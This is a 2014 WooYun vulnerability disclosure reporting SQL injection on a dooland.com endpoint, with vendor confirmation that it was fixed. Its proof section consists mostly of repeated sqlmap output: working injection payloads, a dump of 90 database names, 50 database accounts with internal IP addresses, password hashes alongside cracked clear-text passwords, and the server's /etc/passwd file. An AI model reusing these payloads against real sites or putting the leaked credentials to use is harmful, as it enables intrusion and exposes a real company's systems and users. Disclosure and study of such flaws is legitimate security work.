当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052155

漏洞标题:读览天下SQL注入漏洞百万用户信息泄露

相关厂商:dooland.com

漏洞作者: Neeke

提交时间:2014-02-27 14:43

修复时间:2014-04-13 14:44

公开时间:2014-04-13 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-27: 细节已通知厂商并且等待厂商处理中
2014-02-27: 厂商已经确认,细节仅向厂商公开
2014-03-09: 细节向核心白帽子及相关领域专家公开
2014-03-19: 细节向普通白帽子公开
2014-03-29: 细节向实习白帽子公开
2014-04-13: 细节向公众公开

简要描述:

读览天下SQL注入漏洞百用户信息泄露

详细说明:

注入点:http://iphone.dooland.com/s.php?id=1958

漏洞证明:

sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1958 AND 7539=7539
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1958 AND (SELECT 4626 FROM(SELECT COUNT(*),CONCAT(0x7161797171,(SELECT (CASE WHEN (4626=4626) THEN 1 ELSE 0 END)),0x716d797071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 45 columns
Payload: id=1958 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7161797171,0x7847765961674242556c,0x716d797071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1958 AND SLEEP(5)
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1958 AND 7539=7539
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1958 AND (SELECT 4626 FROM(SELECT COUNT(*),CONCAT(0x7161797171,(SELECT (CASE WHEN (4626=4626) THEN 1 ELSE 0 END)),0x716d797071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 45 columns
Payload: id=1958 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7161797171,0x7847765961674242556c,0x716d797071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1958 AND SLEEP(5)
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
available databases [90]:
[*] A_Bank
[*] ads
[*] adstat
[*] adsystem
[*] ahvnet
[*] api_site_chinagames
[*] api_site_tttz
[*] asus
[*] bbappnet
[*] billwang
[*] business
[*] client
[*] collector
[*] common
[*] cover
[*] dayoo
[*] dongyou
[*] DoolandERP
[*] doolandmanager
[*] DownLoadInfoDB
[*] dudubao
[*] dudubao_bak
[*] dudubao_book
[*] dudubao_gztv
[*] dudubao_hd
[*] eben
[*] expand
[*] fhxxw
[*] gdvnet
[*] gdvnet2
[*] gdwap
[*] gxvnet
[*] gzvnet
[*] hzkzy
[*] ifeng
[*] information_schema
[*] ipad_adsys
[*] JIANBAO
[*] jigou
[*] jsvnet
[*] jxvnet
[*] kindle_caixin
[*] kuanzon
[*] lcbook
[*] lephone
[*] lib
[*] mag_pub
[*] magazine_upload
[*] mysql
[*] news
[*] newspaper
[*] OEM
[*] opds_aldiko
[*] paycenter
[*] qinghua
[*] qqcaibei
[*] readstat
[*] ReadStat
[*] sctfds
[*] scvnet
[*] seo
[*] shop_car
[*] sina_book
[*] sina_mag_cooperation
[*] stat_dudubao
[*] stat_gxvnet
[*] stat_jxvnet
[*] stat_paihang
[*] suzhmobile
[*] system_check
[*] test
[*] tob_client
[*] ty189
[*] ty189_mail
[*] ty189_mail_hd
[*] ty189_mail_new
[*] ty189_mail_test
[*] ucenter
[*] unicom
[*] union
[*] vip_statistics
[*] vnet139
[*] wangyi163
[*] wap
[*] xjvnet
[*] ynvnet
[*] zazhishe
[*] zhongshan
[*] zhuanti
[*] zjvnet
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1958 AND 7539=7539
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1958 AND (SELECT 4626 FROM(SELECT COUNT(*),CONCAT(0x7161797171,(SELECT (CASE WHEN (4626=4626) THEN 1 ELSE 0 END)),0x716d797071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 45 columns
Payload: id=1958 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7161797171,0x7847765961674242556c,0x716d797071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1958 AND SLEEP(5)
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
database management system users [50]:
[*] ''@'localhost'
[*] 'backup-user'@'121.9.213.6'
[*] 'dbadm'@'121.9.213.10'
[*] 'dbadm'@'121.9.213.12'
[*] 'dbadm'@'121.9.213.13'
[*] 'dbadm'@'121.9.213.14'
[*] 'dbadm'@'121.9.213.16'
[*] 'dbadm'@'121.9.213.19'
[*] 'dbadm'@'121.9.213.20'
[*] 'dbadm'@'121.9.213.21'
[*] 'dbadm'@'121.9.213.36'
[*] 'dbadm'@'121.9.213.43'
[*] 'dbadm'@'121.9.213.44'
[*] 'dbadm'@'121.9.213.58'
[*] 'dbadm'@'121.9.213.59'
[*] 'dbadm'@'121.9.213.6'
[*] 'dbadm'@'121.9.213.7'
[*] 'dbadm'@'121.9.213.8'
[*] 'dbadm'@'121.9.213.9'
[*] 'dbadm'@'192.168.130.70'
[*] 'dbadm'@'58.68.145.24'
[*] 'dbadm'@'localhost'
[*] 'dbreader'@'121.9.213.7'
[*] 'ens'@'121.14.1.122'
[*] 'ens'@'121.14.1.127'
[*] 'ens'@'121.14.1.131'
[*] 'ens'@'121.14.1.133'
[*] 'ens'@'121.14.1.134'
[*] 'ens'@'121.9.213.12'
[*] 'ens'@'121.9.213.13'
[*] 'ens'@'121.9.213.19'
[*] 'ens'@'121.9.213.20'
[*] 'ens'@'121.9.213.22'
[*] 'ens'@'121.9.213.3'
[*] 'ens'@'121.9.213.61'
[*] 'ens'@'121.9.213.7'
[*] 'ens'@'121.9.213.9'
[*] 'ens'@'183.213.19.22'
[*] 'ens'@'192.168.130.70'
[*] 'linux'@'121.9.213.7'
[*] 'newspaper'@'121.9.213.4'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'roots'@'121.9.213.12'
[*] 'slave'@'121.9.213.12'
[*] 'win'@'121.9.213.14'
[*] 'win'@'121.9.213.23'
[*] 'win'@'121.9.213.3'
[*] 'win'@'121.9.213.4'
[*] 'ynvnet'@'61.166.111.209'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1958 AND 7539=7539
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1958 AND (SELECT 4626 FROM(SELECT COUNT(*),CONCAT(0x7161797171,(SELECT (CASE WHEN (4626=4626) THEN 1 ELSE 0 END)),0x716d797071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 45 columns
Payload: id=1958 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7161797171,0x7847765961674242556c,0x716d797071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1958 AND SLEEP(5)
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] backup-user [1]:
password hash: 4f05cf8057ff9a0a
clear-text password: q1w2e3r4t5
[*] dbadm [1]:
password hash: 064cbf8303528118
clear-text password: p0o9i8
[*] dbreader [1]:
password hash: 78306d415f2244a5
[*] ens [2]:
password hash: *B0667A7B844A1DC1ABE30851127548E692781264
clear-text password: ens
password hash: 7bb6f4842155c24d
clear-text password: ens
[*] linux [1]:
password hash: 064cbf8303528118
clear-text password: p0o9i8
[*] newspaper [1]:
password hash: 064cbf8303528118
clear-text password: p0o9i8
[*] root [2]:
password hash: 4f05cf8057ff9a0a
clear-text password: q1w2e3r4t5
password hash: NULL
[*] roots [1]:
password hash: 565491d704013245
clear-text password: 12345 6
[*] slave [1]:
password hash: 064cbf8303528118
clear-text password: p0o9i8
[*] win [1]:
password hash: 064cbf8303528118
clear-text password: p0o9i8
[*] ynvnet [1]:
password hash: 5bca263f6b102cdf
读文件:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin
nagios:x:500:500::/home/nagios:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
用户信息:

20140227143851.png


20140227143914.png


修复方案:

求礼物

版权声明:转载请注明来源 Neeke@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-02-27 18:57

厂商回复:

已过滤

最新状态:

暂无


漏洞评价:

评论